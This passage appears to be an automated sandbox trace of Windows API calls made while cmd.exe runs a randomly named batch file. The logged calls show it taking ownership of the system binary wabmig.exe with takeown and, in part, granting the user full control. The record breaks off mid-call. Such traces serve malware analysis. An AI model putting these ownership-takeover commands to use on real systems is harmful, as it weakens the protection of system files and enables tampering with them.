FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xb0ff50 [0296.698] FindClose (in: hFindFile=0xb0ff50 | out: hFindFile=0xb0ff50) returned 1 [0296.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xffffffff [0296.698] GetLastError () returned 0x2 [0296.698] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x85ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x85ea70) returned 0xb0ff50 [0296.698] FindClose (in: hFindFile=0xb0ff50 | out: hFindFile=0xb0ff50) returned 1 [0296.698] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0296.698] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0296.698] GetConsoleTitleW (in: lpConsoleTitle=0x85ef64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.699] InitializeProcThreadAttributeList (in: lpAttributeList=0x85ee90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x85ee74 | out: lpAttributeList=0x85ee90, lpSize=0x85ee74) returned 1 [0296.699] UpdateProcThreadAttribute (in: lpAttributeList=0x85ee90, dwFlags=0x0, Attribute=0x60001, lpValue=0x85ee7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x85ee90, lpPreviousValue=0x0) returned 1 [0296.699] GetStartupInfoW (in: lpStartupInfo=0x85eec8 | out: lpStartupInfo=0x85eec8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0296.699] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0296.699] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0296.699] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0296.699] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.758] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0296.759] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0296.759] lstrcmpW (lpString1="\\takeown.exe", lpString2="\\XCOPY.EXE") returned -1 [0296.759] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\takeown.exe", lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x85ee18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x85ee64 | out: lpCommandLine="takeown /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessInformation=0x85ee64*(hProcess=0xb0, hThread=0xb8, dwProcessId=0xc68, dwThreadId=0xc6c)) returned 1 [0296.767] CloseHandle (hObject=0xb8) returned 1 [0296.767] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0296.767] GetEnvironmentStringsW () returned 0xb0b4e0* [0296.767] FreeEnvironmentStringsA (penv="=") returned 1 [0296.767] WaitForSingleObject (hHandle=0xb0, dwMilliseconds=0xffffffff) returned 0x0 [0297.417] GetExitCodeProcess (in: hProcess=0xb0, lpExitCode=0x85edfc | out: lpExitCode=0x85edfc*=0x0) returned 1 [0297.417] CloseHandle (hObject=0xb0) returned 1 [0297.417] _vsnwprintf (in: _Buffer=0x85eee4, _BufferCount=0x13, _Format="%08X", _ArgList=0x85ee04 | out: _Buffer="00000000") returned 8 [0297.417] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0297.417] GetEnvironmentStringsW () returned 0xb0b4e0* [0297.417] FreeEnvironmentStringsA (penv="=") returned 1 [0297.417] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0297.417] GetEnvironmentStringsW () returned 0xb0b4e0* [0297.417] FreeEnvironmentStringsA (penv="=") returned 1 [0297.417] DeleteProcThreadAttributeList (in: lpAttributeList=0x85ee90 | out: lpAttributeList=0x85ee90) [0297.417] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.418] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0297.548] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.548] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0297.548] _get_osfhandle (_FileHandle=0) returned 0x38 [0297.548] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0297.549] SetConsoleInputExeNameW () returned 0x1 [0297.549] GetConsoleOutputCP () returned 0x1b5 [0297.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0297.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.549] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x85f624, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0297.549] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0297.549] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.549] SetFilePointer (in: hFile=0xb0, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0297.550] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.550] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0297.550] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x85f5f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x85f5f4*=0xb3, lpOverlapped=0x0) returned 1 [0297.550] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0297.550] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=16, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0297.550] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.550] GetFileType (hFile=0xb0) returned 0x1 [0297.550] _get_osfhandle (_FileHandle=3) returned 0xb0 [0297.550] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0297.550] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", nBufferLength=0x208, lpBuffer=0x85ed70, lpFilePart=0x85ed34 | out: lpBuffer="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFilePart=0x85ed34*="wabmig.exe") returned 0x28 [0297.550] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0297.551] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0297.551] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0297.551] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0297.551] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0297.551] _wcsnicmp (_String1="WINDOW~2", _String2="Windows Mail", _MaxCount=0xc) returned 11 [0297.551] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0297.551] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0297.551] _wcsicmp (_String1="set", _String2=")") returned 74 [0297.551] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0297.551] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0297.551] _wcsicmp (_String1="IF", _String2="set") returned -10 [0297.551] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0297.551] _wcsicmp (_String1="REM", _String2="set") returned -1 [0297.551] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0297.552] _tell (_FileHandle=3) returned 63 [0297.552] _close (_FileHandle=3) returned 0 [0297.552] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f3b8 | out: _Buffer="\r\n") returned 2 [0297.552] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.552] GetFileType (hFile=0x3c) returned 0x2 [0297.552] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.552] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f390 | out: lpMode=0x85f390) returned 1 [0297.552] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.552] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f3a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f3a8*=0x2) returned 1 [0297.552] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0297.552] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0297.553] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x85f3b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0297.553] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x85f3b4 | out: _Buffer=">") returned 1 [0297.553] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.553] GetFileType (hFile=0x3c) returned 0x2 [0297.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.553] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f394 | out: lpMode=0x85f394) returned 1 [0297.553] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.553] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x85f3ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x85f3ac*=0x1e) returned 1 [0297.553] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.553] GetFileType (hFile=0x3c) returned 0x2 [0297.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.553] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f634 | out: lpMode=0x85f634) returned 1 [0297.800] _get_osfhandle (_FileHandle=1) returned 0x3c [0297.800] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xb18220*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x85f64c, lpReserved=0x0 | out: lpBuffer=0xb18220*, lpNumberOfCharsWritten=0x85f64c*=0x3) returned 1 [0298.088] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x85f654 | out: _Buffer=" FN=\"wabmig.exe\" ") returned 17 [0298.088] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.088] GetFileType (hFile=0x3c) returned 0x2 [0298.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0298.088] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f62c | out: lpMode=0x85f62c) returned 1 [0298.555] _get_osfhandle (_FileHandle=1) returned 0x3c [0298.555] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x85f644, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f644*=0x11) returned 1 [0299.292] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f668 | out: _Buffer="\r\n") returned 2 [0299.292] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.292] GetFileType (hFile=0x3c) returned 0x2 [0299.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0299.292] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f640 | out: lpMode=0x85f640) returned 1 [0299.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.527] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f658, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f658*=0x2) returned 1 [0299.682] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0299.682] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0299.682] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0299.682] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0299.682] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0299.682] _wcsicmp (_String1="set", _String2="CD") returned 16 [0299.682] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0299.682] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0299.682] _wcsicmp (_String1="set", _String2="REN") returned 1 [0299.682] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0299.682] _wcsicmp (_String1="set", _String2="SET") returned 0 [0299.682] GetConsoleTitleW (in: lpConsoleTitle=0x85f1d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0299.991] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0299.991] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0299.991] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0299.991] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0299.993] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0299.993] _wcsicmp (_String1="set", _String2="CD") returned 16 [0299.993] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0299.993] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0299.993] _wcsicmp (_String1="set", _String2="REN") returned 1 [0299.993] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0299.993] _wcsicmp (_String1="set", _String2="SET") returned 0 [0299.993] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0299.994] _wcsnicmp (_String1="FN", _String2="/A", _MaxCount=0x2) returned 55 [0299.994] _wcsnicmp (_String1="FN", _String2="/P", _MaxCount=0x2) returned 55 [0299.994] SetEnvironmentVariableW (lpName="FN", lpValue="\"wabmig.exe\"") returned 1 [0299.994] GetEnvironmentStringsW () returned 0xb0b4e0* [0299.994] FreeEnvironmentStringsA (penv="=") returned 1 [0299.994] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.994] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0300.152] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.152] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0300.327] _get_osfhandle (_FileHandle=0) returned 0x38 [0300.327] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0300.568] SetConsoleInputExeNameW () returned 0x1 [0300.568] GetConsoleOutputCP () returned 0x1b5 [0300.766] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0300.766] SetThreadUILanguage (LangId=0x0) returned 0x409 [0300.784] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x85f624, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0300.785] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0300.785] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.785] SetFilePointer (in: hFile=0xb0, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0300.785] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.785] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0300.785] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x85f5f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x85f5f4*=0xa3, lpOverlapped=0x0) returned 1 [0300.785] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0300.785] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0300.785] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.785] GetFileType (hFile=0xb0) returned 0x1 [0300.785] _get_osfhandle (_FileHandle=3) returned 0xb0 [0300.785] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0300.785] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x208, lpBuffer=0x85ed70, lpFilePart=0x85ed34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x85ed34*="vRnqNMBW.bat") returned 0x2a [0300.785] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0300.786] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0300.786] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0300.786] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0300.786] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0300.786] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0300.786] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0300.786] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFindFileData=0x85ea78 | out: lpFindFileData=0x85ea78) returned 0xb09300 [0300.786] FindClose (in: hFindFile=0xb09300 | out: hFindFile=0xb09300) returned 1 [0300.786] _wcsicmp (_String1="cd", _String2=")") returned 58 [0300.786] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0300.786] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0300.786] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0300.786] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0300.786] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0300.786] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0300.787] _tell (_FileHandle=3) returned 78 [0300.787] _close (_FileHandle=3) returned 0 [0300.787] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f3b8 | out: _Buffer="\r\n") returned 2 [0300.787] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.787] GetFileType (hFile=0x3c) returned 0x2 [0300.787] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.787] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f390 | out: lpMode=0x85f390) returned 1 [0300.944] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.944] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f3a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f3a8*=0x2) returned 1 [0300.989] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0300.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0300.989] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x85f3b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0300.990] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x85f3b4 | out: _Buffer=">") returned 1 [0300.990] _get_osfhandle (_FileHandle=1) returned 0x3c [0300.990] GetFileType (hFile=0x3c) returned 0x2 [0300.990] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0300.990] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f394 | out: lpMode=0x85f394) returned 1 [0301.077] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.077] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x85f3ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x85f3ac*=0x1e) returned 1 [0301.107] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.107] GetFileType (hFile=0x3c) returned 0x2 [0301.107] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.107] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f634 | out: lpMode=0x85f634) returned 1 [0301.250] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.250] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xb18370*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f64c, lpReserved=0x0 | out: lpBuffer=0xb18370*, lpNumberOfCharsWritten=0x85f64c*=0x2) returned 1 [0301.321] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x85f654 | out: _Buffer=" /d \"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\\" ") returned 37 [0301.321] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.321] GetFileType (hFile=0x3c) returned 0x2 [0301.321] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.321] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f62c | out: lpMode=0x85f62c) returned 1 [0301.385] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.385] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x25, lpNumberOfCharsWritten=0x85f644, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x85f644*=0x25) returned 1 [0301.434] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x85f668 | out: _Buffer="\r\n") returned 2 [0301.434] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.434] GetFileType (hFile=0x3c) returned 0x2 [0301.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.434] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x85f640 | out: lpMode=0x85f640) returned 1 [0301.437] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.437] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x85f658, lpReserved=0x0 | out: 